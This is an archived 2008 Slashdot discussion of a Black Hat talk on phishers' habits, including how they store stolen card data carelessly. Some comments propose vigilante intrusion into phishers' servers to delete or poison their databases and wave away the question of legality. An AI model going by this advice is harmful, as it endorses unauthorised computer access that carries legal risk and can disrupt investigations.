Follow Slashdot stories on Twitter

 


Forgot your password?
Close
typodupeerror
×
Security Data Storage The Internet

How Phishers Think, Act, and Make a Profit 133

Posted by timothy from the good-laugh-at-your-expense dept.
whitehartstag writes with a write up of "the excellent session at Black Hat that detailed 'how phishers create sites, share info and code, and basically are lazy.' They store their stolen data 'on websites that they have hacked into, or on [publically available] sites like guestbooks. And even worse, they are not protecting their stolen data ... which means that all one needs to do to find this info is to reverse engineer a real phisher's website, look at their PHP script, and find out where they are storing the data.'"
This discussion has been archived. No new comments can be posted.

How Phishers Think, Act, and Make a Profit More

How Phishers Think, Act, and Make a Profit

Comments Filter:

  • I wish the article had good suggestions for how to prevent phishing attacks. Instead, it seems like this article is suggesting I can easily steal already stolen credit-card data.

  • Re:How is this useful for law-abiding citizens? (Score:5, Interesting)

    by davester666 ( 731373 ) on Thursday August 07, 2008 @10:00PM (#24520027) Journal

    Offhand, the only 'good' thing you could do would be to hoop the database. If it's poorly secured, you could get it to delete all the current records. If it's more secure, you could fill it with slightly bogus data [like real names and addresses, but phony credit card numbers.

    This could result in:
    -fills up the drive on the computer it's stored on, which would at least temporarily halt more stupid people from adding their data to it
    -make it difficult to filter out good entries from bad. The data is kind of correct, they might have to actually pass it to the credit card company to actually check if it's good or not
    -if they can't filter out the bad entries, it makes using the database to do 'bulk' transactions easier for the credit card companies to notice [assuming they put much effort into it instead of just passing the cost onto merchants] as it happens, instead of 30 days later when people complain.

  • One time... (Score:1, Interesting)

    by JimboFBX ( 1097277 ) on Thursday August 07, 2008 @10:31PM (#24520227)
    One time I received an e-mail saying my account at a local credit union had been compromised (he was using the university's public ability to look up people to attack their e-mail address). The thing was I didn't have an account at that credit union. I knew it was a phishing scheme, so I clicked the link and intentionally made up a user name said my password was "the FBI is coming". Of course, it went to the next page to re-affirm my personal information.

    I e-mailed the real credit union, told them about it, told them the link, and even who-is'd him for them in the e-mail (it appeared to be an Indian name). They told me they were looking into it. 4 months later I got the same e-mail, same website. A third e-mail showed up next year as well.

    The funny thing is that in the local college newspaper there was a guy who said he'd charge $35 to install Windows Vista on people's computers if they were a college student. Windows Vista was offered for free to individuals of the university, you just had to go download the installer. I called the number on the ad, being pissed off at how he was trying to rip people off, to give him a fake place to show up at. It went to his voice mail.

    He had a thick Indian accent. Same guy? Coincidence? No idea. I ended up not leaving a message.

    I still have the e-mail message. The domain he used is no longer registered to anyone. I hope they nabbed him.

  • Re:How is this useful for law-abiding citizens? (Score:1, Interesting)

    by Anonymous Coward on Thursday August 07, 2008 @10:50PM (#24520357)

    A lot of phish sites using php are sending the captured info to email accounts (gmail and yahoo seem to be the most popular).

    While there are times when you can find credit card or login info in txt files stored on a hacked server, I see them using email as a dumping ground more often, and keeping an actual database on the same server as the site is hosted seems far too dumb to be very common.

    As a side note, I try to report these email accounts when I find them and while I can't say what gmail has done with the reports I've sent them, I can say that yahoo has been completely impossible to work with. The last time I tried, I even got a response back but they misunderstood (obviously didn't bother to fully read) my email. Even after going back and forth with them two other times, and trying everything I could to explain it clearly they didn't get it.

    They kept thinking I was trying to report spam I had seen sent to me from a yahoo account and they wanted headers.

  • Re:How is this useful for law-abiding citizens? (Score:2, Interesting)

    by maxume ( 22995 ) on Thursday August 07, 2008 @11:00PM (#24520403)

    So the only thing keeping poor Billy from stealing data is that he hasn't thought about it and a timely article on /. is going to push him over the edge?

    Probably not.

  • I have to know (Score:3, Interesting)

    by zappepcs ( 820751 ) on Thursday August 07, 2008 @11:07PM (#24520437) Journal

    The title and summary suggest that phishers are somehow less. Lazy? What, are drug dealers not lazy? Pimps more business savvy?

    That is just bothering me. Anyone else think that is just wrong? Lazy? WTF exactly would a non-lazy phisher do? Setup a data center in the Caymans? Seriously!

  • Re:One time... (Score:3, Interesting)

    by c0nsole ( 1164167 ) on Thursday August 07, 2008 @11:10PM (#24520459)
    Sounds like a coincidence to me. I charge way more than that to install any OS on any computer, as the job usually involves backup and migragation of the client's files, tracking down drivers, and other mundane stuff. For $35 it sounds like the guy was just trying to pickup some cash on the side. Even in the technical fields at my university I know there were *many* people who would never attempt something as trivial as installing an OS. Downloading and installing a printer driver is voodoo to those people, even though they themselves installed the printer via the 'quick setup poster' that came with it when it was new. Trying to show these sorts of people how to do this stuff themselves is an exercise in futility. I doubt the phisher in question would have the know-how to even be able to install Vista anyways...I heard they're quite lazy. :)

  • Re:How to prevent phising attacks. (Score:2, Interesting)

    by CDMA_Demo ( 841347 ) on Thursday August 07, 2008 @11:28PM (#24520561) Homepage

    Engage brain before clicking.

    I think you proved subtly that we have a Darwinian mechanism at work through phishers and crackers.

  • Phishers ain't more techsavvy than the average Joe (Score:4, Interesting)

    by Opportunist ( 166417 ) on Friday August 08, 2008 @12:20AM (#24520899)

    With the advent of MPack and other tools from the RBN, it doesn't take a "hacker" anymore to phish. You buy a toolkit, you buy the exploit, you buy a trojan and the scripts for your server, and off you go. The reason why it's successful is simply that there are people who know less than the attacker about security.

    Detach yourself from the idea that phishers are in any way required to be security gurus, or that they're in some way intimate with the inner workings of PCs or networks. Those that know how to code don't attack anymore. They sell their attacking toolkits to others who then conduct the attacks.

  • Re:Phishers Are Lazy Because People Are So Dumb (Score:3, Interesting)

    by DaveWick79 ( 939388 ) on Friday August 08, 2008 @12:39AM (#24521007)
    No, it most certainly affects everybody, because if the phisher is good enough he is going to dupe many merchants out of thousands of dollars, and when the credit card companies issue chargebacks, it will put small businesses out of business, take those thousands of dollars out of the hands of the middle class and put them in the hands of some worthless hacker who is probably going to blow it on dope. It has a far reaching effect.

  • AC? (Score:2, Interesting)

    by funkdancer ( 582069 ) <funkyNO@SPAMfunkdancer.com> on Friday August 08, 2008 @01:41AM (#24521295)

    How long until some jokester does a phishing attack that submits the info to random slashdot threads?

  • Re:How is this useful for law-abiding citizens? (Score:3, Interesting)

    by jschottm ( 317343 ) on Friday August 08, 2008 @02:25AM (#24521491)

    I wish the article had good suggestions for how to prevent phishing attacks.

    But it does. Given that the miscreants are apparently posting information into public forums, simply enter your credit card number into a google search from time to time and see if it turns up. (Note for those without a sense of humor: don't do that.)

    Seriously, what did you expect from a two paragraph writeup (one of which isn't actually about phishing but sale of CCs) of a talk at a conference that says with a wink and a nudge that they cater to the bad guys? There's not actually enough information in the blog (not that there's supposed to be) to warrant getting on slashdot. There's a bunch of resources [google.com] available discussing the subject if you really need information on the subject.

  • Re:How is this useful for law-abiding citizens? (Score:3, Interesting)

    by Eskarel ( 565631 ) on Friday August 08, 2008 @02:56AM (#24521625)
    I really don't think legality is all that much of an issue. You're looking at more risk of them sending hired goons than the police.

    Remember illegal access to a computer is illegal, but anyone running a database full of stolen credit card numbers is probably not going to call the cops on you, especially since to prove you access the system they'd have to keep it pretty much intact.

  • Comment removed (Score:3, Interesting)

    by account_deleted ( 4530225 ) on Friday August 08, 2008 @02:58AM (#24521633)
    Comment removed based on user account deletion

Slashdot Top Deals

To do nothing is to be nothing.

Close